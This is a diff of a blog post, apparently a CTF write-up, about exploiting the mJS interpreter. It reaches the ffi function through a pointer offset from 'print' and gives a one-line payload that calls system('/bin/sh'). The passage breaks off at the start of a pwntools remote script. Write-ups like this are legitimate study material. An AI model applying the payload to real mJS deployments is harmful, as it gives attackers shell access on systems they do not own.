079035/079035.github.io/_posts/2023-03-08-mjs.md

 I cannot call ffi directly, but I can call ffi using ```(print + offset)```, which I believe is the intended vuln.
 And I can calculate offset using gdb.

 ## Exploitation
-The explotation is fairly simple, as we only have to call ffi using the right offset and the right calling convention, which was tricky to figure it out.
+The explotation is fairly simple, as we only have to call ffi using the right offset and the right calling convention, which was a bit tricky to figure out.

 But locally, we just need one line:
 ```
 (print + 0x6ab0)('int system(char *)')('/bin/sh');
 ```

-And for remote, we just supply "EOF" at the end.
+And for remote, we just supply "EOF" at the end to run.
 ```
 #!/usr/bin/python3
 from pwn import *